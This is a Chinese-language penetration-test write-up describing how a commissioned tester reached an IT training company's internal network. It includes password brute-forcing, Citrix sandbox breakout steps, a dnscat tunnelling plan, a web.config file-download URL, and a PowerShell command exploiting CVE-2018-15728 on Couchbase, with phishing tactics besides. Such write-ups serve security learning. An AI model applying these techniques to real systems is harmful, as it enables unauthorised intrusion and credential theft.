背景MITRE ATT&CK™测试过程元数据提取citrix通道写poc提交漏洞参考资料
背景
笔者的一位朋友--就职于安客思科技公司的sunrise童鞋,早先受某SRC委托参与该集团的渗透测试工作,顺利实现进入内网任务,案例较为有趣,特意分享通过本公众号发布。目标厂家主要做IT产品,基础设施建设完成度高,本身也有雄厚的财力实力去堆叠安全产品,经过几轮众测纯渗透的思路很难打到内网,所以该文章展示的将不是传统的扫域名,找漏洞,渗内网,攻防对抗在升级,攻也在进步地深刻把握新技术应用的内涵、特点。
影响范围:客户的解决方案是提供匹配客户发展战略的端到端人员能力提升,在服务转型趋势下,帮助客户快速发展IT基础设施集成、大数据运营、应用开发等IT人才,涉及泄露参与培训的客户员工的个人账户、密码。掌握了内网站点,甚至可以进行“鱼叉式”攻击。
MITRE ATT&CK™
实施渗透前,利用模型推导分析寻找网络威胁。
这是实施完毕后,为客户应急响应中心复盘提交的渗透路径。
测试过程
元数据提取
元数据是提供关于情报资源或数据的一种结构化的数据,基于情报元数据的提取方法不同于资产信息收集,元数据的获取手段针对目标、应用,是针对资源的抽象描述,在渗透中的工作主要是包括对目标进行内网、数据结构和规则进行集合,一些小工具如Sweepatic、theHarvester、Maltego有助于发现、存储、记录、获取并使用情报。假设我们需要攻击“塔利班头领”,显然该目标没有官网、没有内网、如何getshell?这时候任何有效的数据都是敏感的,比如社交用户账户名、习惯、目标使用的软件、历史泄露的内容。通过其在Twitter账户发布的规律,大略得知工作规律,可以发送钓鱼链接作为早上上班第一封邮件,这样精准度高,甚至无聊的职员会从垃圾站中取回邮件;通过在查询新闻报告,可以得知资产并购和接触对象或有价值的组合架构,进行“水坑式攻击”;通过收集发布的文档知道目标使用软件版本、浏览器信息,提高oday利用成功率;通过分析合作关系进行身份伪造;通过查询出口ip信誉检测某款勒索软件,参考勒索软件exp做免杀或者漏洞利用。对于小规模渗透、长时间潜伏是一种独辟蹊径的威胁情报。
使用搜索引擎语法metabot和浏览站点获取站点文档,简要提取有价值的信息。
使用python-docx包处理d.paragraphs方法解析text,或者直接调用exittool脚本解析
代码语言:javascript复制`#/bin/bash`
URL_LIST=$2
DEST_FOLDER=$1
**if** [ "$#" -eq 0 ]; **then**
echo "You need to specify at least a directory with documents!"
**exit** 1
**fi**
**if** [ -z "$URL_LIST" ]; **then**
**if** [ -f failed_downloads.txt ]; **then**
rm failed_downloads.txt
**fi**
**if** [ -f download_list.txt ]; **then**
rm download_list.txt
**fi**
**while** **read** url; **do**
filename="file-$(echo $url|md5sum|awk '{print $1}')"
wget -c --tries 3 -O "$DEST_FOLDER/$filename" "$url"
**if** [ $? -ne 0 ]; **then**
rm $DEST_FOLDER/$filename
echo ${url} >>failed_downloads.txt
**else**
echo ${filename} ${url} >>download_list.txt
**fi**
**done** < $URL_LIST
**fi**
*# Filter out documents using mime type and extract metadata*
MIME_FILTER="^text/. $"
**if** [ -f document_list.txt ]; **then**
rm document_list.txt
**fi**
find $DEST_FOLDER -type f -print0 | **while** IFS= **read** -r -d $'�' doc; **do**
doc_mime=$(file -b --mime-type $doc)
**if** [[ ! $doc_mime =~ $MIME_FILTER ]]; **then**
echo $doc $doc_mime >>document_list.txt
**fi**
**done**
exiftool -j $(cat document_list.txt|awk '{print $1}') >metadata.json执行sh process_documents.sh ./ ./将结果导入splunk,执行查询提取文件元素信息。一番眼花缭乱的操作只是为了获取到该不在搜索引擎的url:下文以A.com为例。
将攻击流量淹没在互联网盲目的扫描活动中,手工进行安全测试必备的隐蔽式扫描,以不被发现为目标操作漏洞挖掘,发现某接口泄露大量用户敏感信息。有外部注册用户权限就可以访问。
http://A.com/getuserinfo?loginname=test101
中间的密码进行脱敏,强度不够,通过猜测直接获取的密码。
以user num、test num和exam num爆破。
获取有效密码后登录
发现是citrix沙盒环境,某些账户被开通远程在线实验,可以直接使用远程桌面。有些需要突破ie11沙盒执行cmd。由于冒用账户进行操作,正常开通课程的时间大都很短。接下来以持续稳定的方式都在闲暇时刻burpsuite账户,尝试访问查看哪些有价值,思考如何取得较大的权限,MS17-010也不能用,因为直接打域控会暴露,打普通pc没有把握找到重点目标还是实验环境。
citrix
搭建过此类环境,发布的app通过citrix服务器farm进行分配,有时候有权限设置不严格的情况。这个办法就多了,经尝试可以使用文件浏览的方式,打开ipop,然后执行dos,指定127.0.0.1,或者使用新建快捷方式,指向c:progra~1cmd.exe的方式;或者打开excel,利用没有禁用的wscript使用开发者工具编辑vbscript脚本。为了方便,我们以调用ie浏览器为例,打开internet配置,设置临时保存目录,这样就进入了explorer,没有右键的权限,但是可以看到虚拟和共享磁盘的众多记录,获取敏感信息。
不能右键就用左键,使用winrar执行杀软路径为cmd.exe即可。
后来想到不能调用cmd.exe,也可以使用第三方软件,以open file的方式选择共享磁盘目录的ipop.exe。你甚至可以用ipop去扫描端口、打开远程桌面!
从zabbix流量信息猜测172.30整段机器很重要,netstat看到众多的用户启用了mstsc进程。
至此获取到了域环境的一个普通用户。其实这时候由于网络划分的原因已经可以进入内网了,下一步可以采用github获取到的账户密码登录员工门户。由于是模拟测试,不涉及具体的数据,所以没有尝试实施。
另外一个思路是攻击外部客户或者外包公司的邮箱账户,然后撞库。
通道
icmp、tcp、http都不通,dns通道是可行的,要利用dnscat,首先要下载dnscat,由于不能访问外网,我们可以使用support站点以客户的case提问上传附件的方式拖资料。
例如通过http://A.com/data/attachment/forum/201703/19/20170319191221083.zip 上传口令破解工具或者免杀版本的wce。
当然我们结合任意文件下载漏洞。http://A.com/StaticFileHandler.ashx?v=V1&type=css&efs=[~/web.config]
获取到各项敏感信息。但是动作太大,不宜直接使用漏洞。
写poc
纯手工操作是为了避免触发hids、waf和各种未知防护设备,通过敏感信息的逐项查看,发现某系统使用了couchbase,可以使用memecache未认证的漏洞查看敏感信息。形成思路可以启用172.30.x.x,执行CVE-2018-15728获取系统权限,查看进程没有杀软,看起来也不是蜜罐,远程桌面连接进入。
powershell脚本为Invoke-WebRequest http://172.30.x.x:8091/diag/eval -Method POST -ContentType "application/json" -Body 'os:cmd("whoami")' -Headers @{Authorization="Basic Q"} -OutFile 1.txt
渗透测试,点到为止。
参考资料
- https://www.mitre.org/publications/technical-papers/finding-cyber-threats-with-attck-based-analytics
- https://mitre-attack.github.io/attack-navigator/enterprise/
- https://www.anquanke.com/post/id/86509
- http://www.sohu.com/a/160429573_804262
- http://www.91ri.org/15206.html
- https://www.anquanke.com/post/id/86225
